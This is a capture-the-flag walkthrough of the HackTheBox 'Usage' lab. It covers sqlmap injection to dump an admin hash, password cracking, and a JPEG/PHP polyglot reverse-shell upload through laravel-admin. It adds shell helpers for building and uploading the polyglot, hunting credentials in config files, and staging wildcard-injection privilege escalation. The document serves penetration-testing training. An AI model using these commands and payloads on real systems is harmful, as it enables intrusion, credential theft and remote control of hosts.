I added usage.htb to /etc/hosts with the given IP address, then navigated to http://usage.htb
echo "10.10.11.18 usage.htb" | sudo tee -a /etc/hosts
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.usage.htb" -u http://usage.htb -fs 154
The -fs 154 flag drops every response of 154 bytes, which is what the server returns for an unknown Host header (request a nonsense subdomain first to get that baseline, then filter on it). This found admin.usage.htb, which I also added to /etc/hosts
echo "10.10.11.18 admin.usage.htb" | sudo tee -a /etc/hosts
whatweb 10.10.11.18
I identified that this website is built using the Laravel framework; HackTricks has a section on pentesting Laravel:
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/laravel
After checking out the Password Reset Option and finding it interesting, I fired up Burp Suite. I captured the POST request, as shown below:
I copied the POST request to a text file, which I named request.txt
POST /forget-password HTTP/1.1
Host: usage.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://usage.htb
Connection: close
Referer: http://usage.htb/forget-password
Cookie: XSRF-TOKEN=eyJpdiI6IkVMOEV1aUo4VjFHSEw3VEIzeERyRVE9PSIsInZhbHVlIjoiR3R4aVJxRWxMakUvNE1oVkQ0SS9DR3Q1T3FBTnZvS2JTY3R3dlFnZEJ2Z2NhaUp2V0FKTGtJSVdUS2VnK3crSlNrUEFnS2NQMXBBQllrWWJtYmdMR0w1SzdxR2dGY3lsT1BHeVRGNXp3bEttWUNRNmRBSkk4RXkxS0xYK1pOb0wiLCJtYWMiOiJlMzkyYTY1YzJjOGQ2MDdiNWI3MTRiZGIxYzk2N2FlMzNiYzFlNjZiZjk4NWE4MDkyYWE3NjgxMGI5NTMxMjgyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjUxUE5tOW5TYlAxd0FFQ3p2YjhEaXc9PSIsInZhbHVlIjoiTGl0Y3hFZU81Y2F2anNXcXNXa3pVd0RwNHcvYjMzbHBSWTlISW80VjZBSzVjTTZDd3FKVkhiNnhPdDVDejNYK2RVNDcvSERMOGc2dzNFMHpycTBSeGZSemk2TEZyZk5QWDE2N05YM21GcWFDcHJRSjVGSTRFajVhSTBOR0IvOTEiLCJtYWMiOiJiYzYwMDUyMGQzMTk2ODM2ZDkxMTI1NjhmYWFmYmU3YjgxZjMzMjUzZGExYWE1YTQ0MTA1NGI4NjMwYmFhMDU4IiwidGFnIjoiIn0%3D
Upgrade-Insecure-Requests: 1
_token=jElJgEoOoONVCfBoDfa67TPzd6VxBk4o43ObgKlY&email=1*
Now, let's fire up sqlmap. The trailing * in email=1* tells sqlmap to inject only at that spot, so it does not waste time on the CSRF token or the headers; it asks whether to honour the custom marker, and --batch answers that and every other prompt with the default. --level 5 --risk 3 turns on all payload families, including the OR-based ones that can alter rows behind an UPDATE, which is fine on a lab box but worth thinking about elsewhere.
# 1. confirm that the email parameter is injectable
sqlmap -r request.txt --level 5 --risk 3 --batch
# 2. list the databases
sqlmap -r request.txt --level 5 --risk 3 --batch --dbs
# 3. tables inside usage_blog
sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog --tables
# 4. columns of admin_users
sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog -T admin_users --columns
# 5. dump the admin username and password hash
sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog -T admin_users -C username,password --dump
So I copied the hash and saved it to pass.txt. The hash has to go in single quotes: inside double quotes the shell would expand $2, $1 and $ohq2kLpBH as variables and write a mangled string to the file.
echo '$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2' > pass.txt
Let's use john to crack it; it recognises the $2y$ prefix as bcrypt on its own.
john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
and I used these credentials (admin : whatever1) to log in to the admin portal at http://admin.usage.htb
Searching for recent vulnerabilities turned up an arbitrary file upload in laravel-admin (CVE-2023-24249). The advisory names version 1.8.19 as affected; the target runs 1.8.18, an earlier release, so it should be affected as well. This article covers the exploitation:
https://flyd.uk/post/cve-2023-24249/
Let's prepare the webshell. I used Kali's PHP reverse shell at /usr/share/webshells/php/php-reverse-shell.php, set the IP to my tun0 address and the port to 4444, and then used 010 Editor to embed it in an image: a file that is still a valid JPEG to any magic-byte or MIME check, but that PHP will execute once it is served with a .php extension.
cp /usr/share/webshells/php/php-reverse-shell.php .
# set $ip to your tun0 address and $port to 4444
nano php-reverse-shell.php
010 Editor can be downloaded from https://www.sweetscape.com/download/010editor/
Extract it and run it.
Then I went to http://admin.usage.htb, opened the administrator settings and downloaded the current admin avatar image, as shown below.
I opened that image in 010 Editor (Open File -> select the image file), moved to the end of the JPEG header, pasted in the php-reverse-shell code and saved the file as shell.jpg. The image's own header is untouched, so the file still starts with the JPEG magic bytes.
Let's create a netcat listener:
nc -nlvp 4444
Then I fired up Burp Suite and intercepted the upload of shell.jpg. In the intercepted request I changed the filename to shell.jpg.php and forwarded it. The upload goes through because the content is still a valid JPEG, and the .php extension is what gets the file executed:
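As an added example (not from the original post), the following shell functions build the same kind of JPEG/PHP polyglot without 010 Editor and check it the way a magic-byte filter would. They append the payload after the image data instead of inserting it after the header; PHP only starts interpreting at the first <?php tag, so either placement works. The form field name (avatar), the endpoint and the cookie file used in upload_polyglot are assumptions, to be replaced with the values from the request captured in Burp.

```shell
#!/bin/sh
# Added example, not code from the original post. Builds a JPEG that is also
# a PHP script and checks it the way a naive upload filter would.
# Assumptions (not from the post): the upload form field is called "avatar",
# the endpoint is passed in as $2, and cookies.txt holds the admin session.

# Append the PHP payload after the image bytes. The file keeps the JPEG
# header, and PHP emits everything before "<?php" verbatim, then runs the code.
build_polyglot() {            # build_polyglot image.jpg payload.php out.jpg
    cat "$1" "$2" > "$3"
}

# A JPEG starts with FF D8 FF (SOI marker plus the next marker byte). This is
# what `file` and most "is it really an image?" checks look at.
magic_hex() {                 # prints e.g. ffd8ff
    dd if="$1" bs=1 count=3 2>/dev/null | od -An -tx1 | tr -d ' \n'
}

# Returns 0 when the file both passes the JPEG magic check and still carries
# the PHP open tag, i.e. it is a usable polyglot.
verify_polyglot() {
    [ "$(magic_hex "$1")" = "ffd8ff" ] && grep -q '<?php' "$1"
}

# curl equivalent of editing the multipart filename in Burp: the JPEG bytes
# are sent under the name shell.jpg.php with an image content type.
upload_polyglot() {           # upload_polyglot shell.jpg http://admin.usage.htb/<upload-endpoint>
    curl -s -b cookies.txt \
        -F "avatar=@$1;filename=shell.jpg.php;type=image/jpeg" "$2"
}

# Constructed sample input: bytes that start with the JPEG SOI marker and end
# with EOI (enough for a magic check, not a decodable picture) and a stub
# payload standing in for php-reverse-shell.php.
demo() {
    tmp=$(mktemp -d)
    printf '\377\330\377\340JFIF\377\331' > "$tmp/avatar.jpg"
    printf '<?php system("id"); ?>\n' > "$tmp/payload.php"
    build_polyglot "$tmp/avatar.jpg" "$tmp/payload.php" "$tmp/shell.jpg"
    if verify_polyglot "$tmp/shell.jpg"; then
        echo "polyglot ok, magic=$(magic_hex "$tmp/shell.jpg")"
    fi
    echo "$tmp"
}
```

Run demo to build and check a sample; for the real thing call build_polyglot with the downloaded avatar and the edited php-reverse-shell.php, start the nc listener, then call upload_polyglot (or do the same rename in Burp).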
So we got the reverse shell; let's get user.txt.
I was searching all the options to escalate privileges, but I couldn't find anything. So I tried listing all users on the system.
I realised I needed to locate Xander's credentials, but how? Then I stumbled upon a file (.monitrc) that contained them.
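As an added example (not from the original post) that generalises the .monitrc find: a small credential hunt over readable config-looking files. Monit's own syntax for the web interface login is a line of the form "allow user:password" inside the httpd block, and the patterns below also catch the usual password= and secret: forms. The sample directory and its contents in the test are constructed for the demo, not taken from the target.

```shell
#!/bin/sh
# Added example, not from the original post. Prints "file:line:text" for
# every readable config-style file under $1 that holds a credential-looking
# line. File name patterns and the regex are choices for this demo.
find_creds() {
    find "$1" -xdev -type f \( -name '.*rc' -o -name '*.conf' -o -name '*.cfg' \
        -o -name '*.ini' -o -name '.env' -o -name '*.env' \
        -o -name '*.yml' -o -name '*.yaml' \) 2>/dev/null |
    while IFS= read -r f; do
        # skip files we cannot read as the current user
        [ -r "$f" ] || continue
        # monit "allow user:pass", plus password= / passwd: / secret= forms
        grep -HnEi '(allow +[a-z0-9_]+:[^ ]+|passw(or)?d *[:=] *[^ ]+|secret *[:=] *[^ ]+)' \
            "$f" 2>/dev/null
    done
}

# Number of hits, handy as a quick "is there anything here at all" check.
count_creds() {
    find_creds "$1" | wc -l | tr -d ' '
}
```

On the box this would be run as find_creds / against the whole filesystem; the hit in .monitrc is the line that gave up Xander's password.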
ssh xander@usage.htb
sudo -l
Since this is custom software, there's no way to attack it through GTFOBins. However, we can run strings on the binary that sudo -l lists to see the command it executes. Because that command uses a * wildcard, we can use the wildcard spare tricks from HackTricks:
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks
So we are able to get root.txt. Let's use the same method to get a root shell.
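As an added example (not from the original post), the shell functions below show the mechanism the wildcard tricks rely on and what the fix looks like: when a privileged program runs "<tool> *" inside a directory we can write to, the shell expands * and every file name we created becomes a separate argument. Which names matter depends on the tool the binary calls (GNU tar parses --options out of the list; 7z treats @name as a list of files to add and reports each entry it cannot find, which is how a symlinked file's contents end up in its output). The scratch directory, the file names and the /etc/hostname stand-in for a root-only file are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post. Demonstrates glob expansion
# as an argument-injection vector and the anchored-glob fix.
LC_ALL=C; export LC_ALL     # deterministic glob order for the demo

# Simulates the vulnerable invocation: the shell expands * and each file
# name, attacker-created ones included, is handed to the tool as argv.
argv_unsafe() ( cd "$1" && printf '%s\n' * )

# Fix: anchor the glob with ./ so no expansion can start with - or @.
argv_safe() ( cd "$1" && printf '%s\n' ./* )

# Check worth running first: does the directory already contain a name
# that the target tool would read as an option or a list file?
has_option_like_names() (
    cd "$1" || return 1
    for f in *; do
        case $f in -*|@*) return 0 ;; esac
    done
    return 1
)

# Attacker staging in the general shape HackTricks describes: a file whose
# name is an option/list-file marker, plus a symlink carrying the name the
# tool will then try to read. /etc/hostname stands in for a root-only file.
stage() {                    # stage <writable-dir>
    touch "$1/--help" "$1/@root.txt"
    ln -sf /etc/hostname "$1/root.txt"
}
```

argv_unsafe on a staged directory shows --help and @root.txt arriving as their own arguments; argv_safe shows the same names rendered harmless as ./--help and ./@root.txt.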
After creating the id_rsa file and setting the required permissions with chmod 600 id_rsa, I used SSH with the -i option to specify the private key and connect to the server.
BOOM !!! :D